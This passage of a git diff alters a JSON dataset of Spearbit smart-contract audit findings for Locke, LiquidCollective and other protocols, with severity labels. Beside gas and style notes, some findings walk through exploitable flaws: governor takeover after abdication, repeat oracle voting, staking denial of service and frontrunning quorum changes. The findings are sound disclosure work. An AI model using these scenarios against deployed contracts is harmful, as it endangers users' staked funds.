LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula use (numSold + 1) instead of just numSold transferUserEmissionMultiple The above utility function transfers an amount of a user's emission's multiple to another user. Other than transfer- ring that emission amount, it also updates both users lastBalance and lastTimestamp The natspec comment should be updated to cover this information.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "There are no range/value checks when some parameters get fileed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are no range/value checks when some parameters get fileed. For example: There are no hardcoded range checks for the ...Numerators and ...Denominators, so that the protocol's users can trustlessly assume the authorized users would not push these values into ranges seemed unac- ceptable. When an address get updated, we don't check whether the value provided is address(0) or not.", + "title": "Mark functions not called internally as external to improve code quality", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The following functions could be declared as external to save gas and improve code quality: Goo.mintForGobblers Goo.burnForGobblers Goo.burnForPages GobblerReserve.withdraw", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the codebase, some storage slots are manually constructed using keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known. This can allow in future for actors to find a potential path to those storage slots using the keccak256 hash function in the codebase and some crafted payload.", + "title": "UnaccruedSeconds do not increase even if nobody is actively staking", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The unstreamed variable tracks whether someone is staking in the contract or not. However, because of the division precision loss at Locke.sol#L164-L166 and Locke.sol#L187, unstreamed > 0 may happen even when everyone has already withdrawn all deposited tokens from the contract, i.e. ts.token = 0 for everyone. Consider the following proof of concept with only two users, Alice and Bob: streamDuration = 8888 At t = startTime, Alice stakes 1052 wei of deposit tokens. At t = startTime + 99, Bob stakes 6733 wei of deposit tokens. At t = startTime + 36, both Alice and Bob exits from the contract. At this point Alices and Bobs ts.tokens are both 0 but unstreamed = 1 wei. The abovementined numbers are the resault of a fuzzing campaign and were not carefully crafted, therefore this issue can also occur under normal circumstances. function updateStreamInternal() internal { ... uint256 tdelta = timestamp - lastUpdate; if (tdelta > 0) { if (unstreamed == 0) { unaccruedSeconds += uint32(tdelta); } else { unstreamed -= uint112(tdelta * unstreamed / (endStream - lastUpdate)); } } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "Avoid shadowing variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The highlighted line declares a new variable owner which has already been defined in Auth.sol inherited by LienToken: address owner = ownerOf(lienId);", + "title": "Old governor can call acceptGov() after renouncing its role through _abdicate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The __abdicate function does not reset pendingGov value to 0. Therefore, if a pending governor is set the user can become a governor by calling acceptGov.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "PublicVault.accrue is manually inlined rather than called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault: In totalAssets In _accrue And in updateVaultAfterLiquidation", + "title": "User can lose their reward due truncated division", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The truncated division can cause users to lose rewards in this update round which may happen when any of the following conditions are true: 1. RewardToken.decimals() is too low. 2. Reward is updated too frequently. 3. StreamDuration is too large. 4. TotalVirtualBalance is too large (e.g., stake near the end of stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: rewardToken.decimals() = 6. depositToken.decimals() can be any (assume its 18). rewardTokenAmount = 1K * 10**6. streamDuration = 1209600 (two weeks). totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining where depositToken- Amount = 100K 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream) lastApplicableTime() - lastUpdate = 100 (about 7 block-time). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. User wants to buy the reward token at the price of 100K/1K = 100 deposit token but does not get any because of the truncated division. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "CollateralToken.flashAction reverts with incorrect error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Reverts with InvalidCollateralStates.AUCTION_ACTIVE when the address is not flashEnabled.", + "title": "The streamAmt check may prolong a user in the stream", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (untilstreamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate or 0 altogether for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, tts in Alices interest to exit the pool as early as possible especially when this is an indefinite stream. Otherwise the user would be receiving a bad rate for their deposit token.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: Medium Risk" ] }, { - "title": "AstariaRouter has unnecessary access to setPayee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "LienToken.setPayee. setPayee is never called from AstariaRouter, but the router has access to call", + "title": "User can stake before the stream creator produced a funding stream", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Consider the following scenario: 1. Alice stakes in a stream before the stream starts. 2. Nobody funds the stream,. 3. In case of an indefinite stream Alice loses some of her deposit depending on when she exits the stream. For a usual stream Alice will have her deposit tokens locked until endDepositLock.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: Medium Risk" ] }, { - "title": "ClearingHouse can be deployed only when needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When collateral is deposited, a Clearing House is automatically deployed. However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contract as needed. Further, let's look at the two situations where we may need a Clearing House: 1) The collateral holder calls listForSaleOnSeaport(): In this case, the borrower is paying anyways, so it's a no brainer. 2) Another user calls liquidate(): In this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs.", + "title": "Potential funds locked due low token decimal and long stream duration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "In case where the deposit token decimal is too low (4 or less) or when the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and should wait until streamAmt > 0 or the stream ends. Altough unlikely to happen it still is a potential lock of funds issue. 11 function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ,! ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Medium Risk" ] }, { - "title": "PublicVault.claim() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "For claim not to revert we would need to have msg.sender == owner(). And so when the following is called: _mint(owner(), unclaimed); Instead of owner() we can use msg.sender since reading the immutable owner() requires some calldata lookup.", + "title": "Sanity check on the reward tokens decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Add sanity check on the reward tokens decimals, which shouldnt exceed 33 because Token- Stream.rewards has a uint112 type. constructor( ) { uint64 _streamId, address creator, bool _isIndefinite, address _rewardToken, address _depositToken, uint32 _startTime, uint32 _streamDuration, uint32 _depositLockDuration, uint32 _rewardLockDuration, uint16 _feePercent, bool _feeEnabled LockeERC20( _depositToken, _streamId, _startTime + _streamDuration + _depositLockDuration, _startTime + _streamDuration, _isIndefinite ) MinimallyExternallyGoverned(msg.sender) // inherit factory governance // No error code or msg to reduce bytecode size require(_rewardToken != _depositToken); // set fee info feePercent = _feePercent; feeEnabled = _feeEnabled; // limit feePercent require(feePercent < 10000); // store streamParams startTime = _startTime; streamDuration = _streamDuration; // set in shared state 12 endStream = startTime + streamDuration; endDepositLock = endStream + _depositLockDuration; endRewardLock = startTime + _rewardLockDuration; // set tokens depositToken = _depositToken; rewardToken = _rewardToken; // set streamId streamId = _streamId; // set indefinite info isIndefinite = _isIndefinite; streamCreator = creator; uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one); // set lastUpdate to startTime to reduce codesize and first users gas lastUpdate = startTime; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Can remove incoming terms from LienActionBuyout struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Incoming terms are never used in the LienActionBuyout struct. The general flow right now is: incomingTerms are passed to VaultImplementation#buyoutLien. These incoming terms are validated and used to generate the lien information. The lien information is encoded into a LienActionBuyout struct. This is passed to LienToken#buyoutLien, but then the incoming terms are never used again.", - "labels": [ + "title": "Use a stricter bound for transferability delay", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "modifier transferabilityDelay { // ensure the time is after end stream if (block.timestamp < endStream) revert NotTransferableYet(); _; }", + "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Refactor updateVaultAfterLiquidation to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the If we are, we call _deployWithdrawProxyIfNotDeployed and assign withdrawProxyIfNearBoundary to epoch. the result. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuc- tionWindow of the end of the epoch. This is true because (a) withdraw proxy will always be deployed by the end of that block and (b) withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow.", + "title": "Potential issue with malicious stream creator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Assume that users staked tokens at the beginning. The malicious stream creator could come and stake an extremely large amount of tokens thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens. 13 function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Use collateralId to set collateralIdToAuction mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_listUnderlyingOnSeaport() sets collateralIdToAuction mapping as follows: s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true; Since this function has access to collateralId, it can be used instead of using zoneHash.", + "title": "Moving check require(feePercent < 10000) in updateFeeParams to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "feePercent comes directly from LockeFactorys feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Storage packing", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is sub optimal. 1. maxInterestRate and minInterestBPS: These two values pack into a single storage slot, however, are never referenced together outside of the constructor. This means, when read from storage, there are no gas efficiencies gained. 2. Comments denoting storage slots do not match implementation. The comment //slot 3 + for example occurs far after the 3rd slot begins as the addresses do not pack together. LienStorage: 3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read as it is read alone. VaultData: 4. VaultData packs currentEpoch into the struct's first slot, however, it is more commonly read along with values from the struct's second slot.", + "title": "Use calldata instead of memory for some function parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "ClearingHouse fallback can save WETH address to memory to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The fallback function reads WETH() from ROUTER three times. once and save to memory for the future calls.", + "title": "Update cumulativeRewardPerToken only once after stream ends", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "CollateralToken's onlyOwner modifier doesn't need to access storage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The onlyOwner modifier calls to ownerOf(), which loads storage itself to check ownership. We can save a storage load since we don't need to load the storage variables in the modifier itself.", + "title": "Expression 10**one can be unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one)", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Can stop loop early in _payDebt when everything is spent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0.", + "title": "Calculation of amt can be unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The value newBal in this context is always greater than prevBal because of the check located at Locke.sol#534. Therefore, we can use unchecked subtraction.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Can remove initializing allowList and depositCap for private vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely.", + "title": "Change lastApplicableTime() to endStream", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Since block.timestamp >= endStream in the abovementioned cases the lastApplicableTime function will always return endStream.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Since only the keccak256 of preTransferState is checked against the kec- cak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas. Unless there is a plan to use the bytes memory preTransferState in some other form as well.", + "title": "Simplifying code logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } 17 function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) { unchecked { uint32 timestamp = uint32(block.timestamp); (uint32 startTime, uint32 endStream, ,) = stream.streamParams(); if (block.timestamp >= endStream) return 0; ( uint256 lastCumulativeRewardPerToken, uint256 virtualBalance, uint112 rewards, uint112 tokens, uint32 lastUpdate, bool merkleAccess ) = stream.tokenStreamForAccount(address(who)); if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Informational" ] }, { - "title": "Define an endpoint for LienToken that only returns the liquidator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data.", + "title": "Operators._hasFundableKeys returns true for operators that do not have fundable keys", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys be validated and return true. Scenario: Op1 has keys = 10 limit = 10 funded = 10 stopped = 10 This means that all the keys got funded, but also \"exited\". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in getAllFundable returned array. That function is critical because it is the one used by pickNextValidators that picks the next validator to be selected and stake delegate user ETH. Because of this issue in _hasFundableKeys also the issue OperatorsRegistry._getNextValidatorsFromActive- Operators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) can happen DOSing the contract that will always make pickNextValidators return empty. Check Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Critical Risk" ] }, { - "title": "Setting uninitialized stack variables to their default value can be avoided.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Setting uninitialized stack variables to their default value adds extra gas overhead. T t = ;", + "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "This issue is also related to OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator . Consider a scenario where we have Op at index 0 name op1 active true limit 10 funded 10 stopped 10 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 In this case, Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10 it means that it has no more keys to get funded again. Op2 instead has still 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 it will set selectedOperatorAvailableKeys = 0 and as a result, the function will return return (new bytes[](0), new bytes[](0));. 13 In this scenario when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)) the function will always return an empty result, breaking the pickNextValidators mechanism that won't be able to stake user's deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Critical Risk" ] }, { - "title": "Simplify / optimize for loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the codebase, sometimes there are for loops of the form: for (uint256 i = 0; ; i++) { } These for loops can be optimized.", + "title": "Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of removeMember is introducing an exploit that allows an oracle member to vote again and again (in the same epoch) and an oracle that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0 m0 to the list of members members[0] = m0. 2) At T1 m1 to the list of members members[1] = m1. 3) At T3 m0 call reportBeacon(...). By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has registered the vote. 4) At T4, the oracle admin call removeMember(m0). This operation, as we said, will swap the member's address from the last position of the array of members with the position of the member that will be deleted. After doing that will pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch because when he/she will call reportBeacon(...) the function will enter inside the check. if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that have already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract add again the deleted oracle, it would be added to the position 1 of the array of the members, allowing the same member that have already voted, to vote again. Note: while the scenario where a removed member can vote multiple time would involve a corrupted admin (that would re-add the same member) the second scenario that prevent a user to vote would be more common. Check the Appendix for a test case to reproduce this issue. 14", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "calculateSlope can be more simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "calculateSlope can be more simplified: owedAtEnd would be: owedAtEnd = amt + (tend (cid:0) tlast )r amt 1018 where: amt is stack.point.amount tend is stack.point.end tlast is stack.point.last r is stack.lien.details.rate and so the returned value would need to be r amt 1018.", + "title": "Order of calls to removeValidators can affect the resulting validator keys set", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different set of parameters: T1 : (I, R1) T2 : (I, R2) Then depending on the order of transactions, the resulting set of validators for this operator might be different. And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys are going to be removed. This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } to removeValidators and compare it", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "Break out of _makePayment for loop early when totalCapitalAvailable reaches 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _makePayment we have the following for loop: for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; unchecked { ++i; } } When totalCapitalAvailable reaches 0 we still call _payment which costs a lot of gas and it is only used for transferring 0 assets, removing and adding the same slope for a lien owner if it is a public vault and other noops.", + "title": "Non-zero operator.limit should always be greater than or equal to operator.funded", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: High Risk" ] }, { - "title": "_buyoutLien can be optimized by reusing payee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "payee in _buyoutLien can be reused to save some gas", + "title": "Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Assume there are 2 groups of oracle members A, B where they have voted for report variants Va and Vb respectively. Let's also assume the count for these variants Ca and Cb are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant Va or Vb gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that the free oracle member agent can frontrun the admin transaction to decide the quorum earlier in the scenario above. Thus this way _getQuorumReport would actually return that it is a quorum.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "isValidRefinance and related storage parameters can be moved to LienToken", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "isValidRefinance is only used in LienToken and with the current implementation it requires reading AstariaRouter from the storage and performing a cross-contract call which would add a lot of overhead gas cost.", + "title": "_getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays. Even though there could be other approved and non-funded validators from other operators. Related: OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator , OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) , _hasFundableKeys marks operators that have no more fundable validators as fundable.", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "LiquidCollective", + "Severity: Medium Risk" ] }, { - "title": "auctionWindowMax can be reused to optimize liquidate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are mutiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate func- tion which would make the function to read from the storage twice each time. Also there is already a stack variable auctionWindowMax defined as the sum which can be reused.", + "title": "Dust might be trapped in WlsETH when burning one's balance.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "It is not possible to burn the exact amount of minted/deposited lsETH back because of the _value provided to burn is in ETH. Assume we've called mint(r,v) with our address r, then to get the v lsETH back to our address, we need to find an x where v = bx S B c and call burn(r, x) (Here S represents the total share of lsETH and B the total underlying value.). It's not always possible to find the exact x. So there will always be an amount locked in this contract ( v (cid:0) bx S B c ). These dust amounts can accumulate from different users and turn into a big number. To get the full amount back, the user needs to mint more wlsETH tokens so that we can find an exact solution to v = bx S B c. The extra amount to get the locked-up fees back can be engineered. The same problem exists for transfer and transferFrom. Also note, if you have minted x amount of shares, the balanceOf would tell you that you own b = b xB S c wlsETH. Internally wlsETH keeps track of the shares x. So users think they can only burn b amount, plug that in for the _value and in this case, the number of shares burnt would be b xB S cS B % $ which has even more rounding errors. wlsETH could internally track the underlying 